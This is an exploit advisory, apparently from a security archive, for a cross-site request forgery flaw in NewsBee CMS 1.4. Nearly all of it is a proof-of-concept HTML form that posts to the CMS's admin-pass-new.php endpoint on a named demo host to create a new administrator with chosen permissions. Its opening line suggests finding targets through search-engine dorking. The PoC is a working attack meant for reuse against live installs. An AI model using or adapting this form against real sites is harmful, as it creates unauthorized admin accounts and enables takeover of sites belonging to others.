NewsBee CMS 1.4 CSRF Vulnerability

2018.06.28
indoushka (DZ)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

====================================================================================================================================
| # Title     : NewsBee CMS 1.4 CSRF Vulnerability
| # Author    : indoushka
| # Telegram  : @indoushka
| # Tested on : windows 10 Français V.(Pro)
| # Vendor    : https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937
| # Dork      : N/A
====================================================================================================================================

poc :

[+] Dorking In Google Or Other Search Engine .
[+] save as poc.html .

<div class="full-height-scroll">
  <div class="table-responsive" style="float:left;">
    <div>
      <form action="http://codecanyon.nelliwinne.net/NewsBee/admin/admin-pass-new.php?" id="form1" name="form1" method="POST" onsubmit="document.getElementById('loading').innerHTML='Loading...';" style="width:400px;">
        <label>Username</label>
        <input name="un" required="" class="form-control" id="un" autocomplete="off" value="" type="text">
        <label>Password</label>
        <input name="pw" required="" class="form-control" id="pw" value="" type="password">
        <label>Permissions</label>
        <table class="table table-striped table-bordered table-hover " width="300">
          <tbody>
            <tr>
              <td bgcolor="#CCCCCC">&nbsp;</td>
              <td width="60" bgcolor="#CCCCCC"><strong>Tab Permission</strong></td>
              <td width="60" bgcolor="#CCCCCC"><strong>Comment Moderate</strong></td>
              <td width="60" bgcolor="#CCCCCC"><strong>New</strong></td>
              <td width="60" bgcolor="#CCCCCC"><strong>Edit</strong></td>
              <td width="60" bgcolor="#CCCCCC"><strong>Delete</strong></td>
            </tr>
            <tr>
              <td bgcolor="#CCCCCC">News</td>
              <td valign="middle" align="center"><input name="news" class="form-control form-inline" id="news" value="Y" checked="CHECKED" type="checkbox"></td>
              <td valign="middle" align="center"><input name="news_moderation" id="news_moderation" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="news_new" id="news_new" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="news_edit" id="news_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="news_delete" id="news_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
            </tr>
            <tr>
              <td bgcolor="#CCCCCC"><strong>Videos</strong></td>
              <td valign="middle" align="center"><input name="videos" class="form-control form-inline" id="videos" value="Y" checked="CHECKED" type="checkbox"></td>
              <td valign="middle" align="center">x</td>
              <td valign="middle" align="center"><input name="videos_new" id="videos_new" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="videos_edit" id="videos_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="videos_delete" id="videos_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
            </tr>
            <tr>
              <td bgcolor="#CCCCCC"><strong>Gallery</strong></td>
              <td valign="middle" align="center"><input name="gallery" class="form-control form-inline" id="gallery" value="Y" checked="CHECKED" type="checkbox"></td>
              <td valign="middle" align="center">x</td>
              <td valign="middle" align="center"><input name="gallery_new" id="gallery_new" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="gallery_edit" id="gallery_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="gallery_delete" id="gallery_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
            </tr>
            <tr>
              <td bgcolor="#CCCCCC"><strong>Ads</strong></td>
              <td valign="middle" align="center"><input name="ads" id="ads" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center">x</td>
              <td valign="middle" align="center"><input name="ads_new" id="ads_new" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="ads_edit" id="ads_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="ads_delete" id="ads_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
            </tr>
            <tr>
              <td bgcolor="#CCCCCC"><strong>Home Slider</strong></td>
              <td valign="middle" align="center"><input name="slider" id="slider" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center">x</td>
              <td valign="middle" align="center"><input name="slider_new" id="slider_new" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="slider_edit" id="slider_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="slider_delete" id="slider_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
            </tr>
            <tr>
              <td bgcolor="#CCCCCC"><strong>FAQ</strong></td>
              <td valign="middle" align="center"><input name="faq" id="faq" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center">x</td>
              <td valign="middle" align="center"><input name="faq_new" id="faq_new" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="faq_edit" id="faq_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="faq_delete" id="faq_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
            </tr>
            <tr>
              <td bgcolor="#CCCCCC"><strong>Categories</strong></td>
              <td valign="middle" align="center"><input name="categories" id="categories" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center">x</td>
              <td valign="middle" align="center"><input name="categories_new" id="categories_new" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="categories_edit" id="categories_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="categories_delete" id="categories_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
            </tr>
            <tr>
              <td bgcolor="#CCCCCC"><strong>Pages</strong></td>
              <td valign="middle" align="center"><input name="pages" id="pages" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center">x</td>
              <td valign="middle" align="center"><input name="pages_new" id="pages_new" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="pages_edit" id="pages_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
              <td valign="middle" align="center"><input name="pages_delete" id="pages_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
            </tr>
          </tbody>
        </table>
        <input name="Submit" id="button" value="Create User" class="btn btn-primary form-control" type="submit">
        <input name="MM_insert" value="form1" type="hidden">
        <input name="MM_update" value="form1" type="hidden">
      </form>
      <br>
    </div>
  </div>
</div>

Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic * hyp3rlinx * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * shadow_00715 * yasMouh |
=======================================================================================================================================


Copyright 2024, cxsecurity.com

 
